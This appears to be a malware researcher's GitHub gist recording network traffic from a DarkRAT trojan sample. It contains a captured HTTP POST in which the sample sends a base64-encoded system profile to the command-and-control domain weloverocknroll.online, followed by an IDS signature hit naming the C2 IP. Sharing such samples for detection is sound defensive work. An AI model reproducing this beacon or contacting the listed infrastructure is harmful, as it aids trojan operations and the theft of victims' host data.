Skip to content

Instantly share code, notes, and snippets.

@malwareforme

malwareforme/gist:2ca4771d981f061a8c5054416049fefd

Created August 15, 2019 14:16
Download ZIP

Revisions

  1. malwareforme created this gist Aug 15, 2019.
    14 changes: 14 additions & 0 deletions gistfile1.txt
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,14 @@
    https://app.any.run/tasks/c9b7183c-011b-4a50-96cc-b09c2876b183/

    POST /request HTTP/1.1
    Accept: text/plain
    Content-Type: application/x-www-form-urlencoded
    User-Agent: rvOgJiq
    Host: weloverocknroll.online
    Content-Length: 640

    request=YUhkcFpEMWxaV1ZpTldRMU5DMDNPRGd3TFRReVlUY3RZalUwTWkwM016bGlZbU15Tm1ObU5HSW1ZMjl0Y0hWMFpYSnVZVzFsUFZWVFJWSXRVRU1tWVc5eWJtOTBQV1poYkhObEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UWXhPU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDEwY25WbEptRnVkR2wyYVhKMWN6MG1ZbTkwZG1WeWMybHZiajB5TGpFdU15Wm5jSFZPWVcxbFBXUkhPV3RpZHowOUptTndkVTVoYldVOVUxYzFNRnBYZDI5VmFXdG5VVEk1ZVZwVGFGVlVVMnRuWVZSVmRFNXFVWGROUTBKRVZVWlZaMUZEUVhsTWFtTjNVakJvTmlaaGNtTm9QV1ZFV1RBbWIzQmxjbWx1WjNONWMzUmxiVDFXTW14MVdrYzVNMk41UVROSlJrNXNZMjVhY0ZreVZXZFZSMFpxWVhsQmVDWnpjSEpsWVdSMFlXYzliV0ZwYmc9PQ==

    ========================SID HITS========================

    08/02/2019-16:50:20.342727 [**] [1:2837970:2] ETPRO TROJAN Win32/DarkRAT CnC Activity [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.100.18:49205 -> 149.129.174.115:80